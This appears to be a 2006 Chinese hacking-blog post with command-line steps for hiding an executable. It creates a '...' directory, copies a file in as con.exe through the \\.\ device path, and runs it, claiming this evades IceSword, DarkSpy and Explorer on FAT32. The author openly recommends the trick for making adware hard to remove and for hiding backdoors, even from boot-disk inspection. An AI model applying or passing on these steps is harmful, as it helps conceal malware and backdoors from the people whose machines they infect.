mysite : http://blog.csdn.net/freexploit/
team : freexploit
date : 2006-09-29
me : allyesno
测试目录为 G:\test\test>dir
G:\test\test 的目录
2006-05-30 16:43 <DIR> .
2006-05-30 16:43 <DIR> ..
2006-05-30 19:47 <DIR> ..
2003-03-27 20:00 464,896 bac.exe
1 个文件 464,896 字节
3 个目录 1,498,521,600 可用字节
看步骤
建立隐藏目录
G:\test\test>md ...\
复制文件
G:\test\test>copy bac.exe \\.\g:\test\test\...\con.exe
已复制 1 个文件。
启动文件
G:\test\test>start \\.\g:\test\test\...\con.exe
检测效果看截图
icesword
darkspy
资源管理器
还有其他一些入侵检测 工具就不一一示范了
allyesno : 另外一些用途 可以用在流氓插件上啊 这样流氓插件就更加难卸载了
还可以用在隐藏后门上面 因为这个方法的特殊性 你就算用另外一个系统 或者 光盘引导
也是无法检测出来的 当然自己写程序是可以 我是说现在一般的 卸载后门 以及 流氓软件的手段
对这个方法都是失效的
注:并不能隐藏该目录下运行的进程 并且这个方法只适用于 FAT32 格式 NTFS似乎不行
GOOGLE广告载入中...
GOOGLE广告载入中... |
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) 
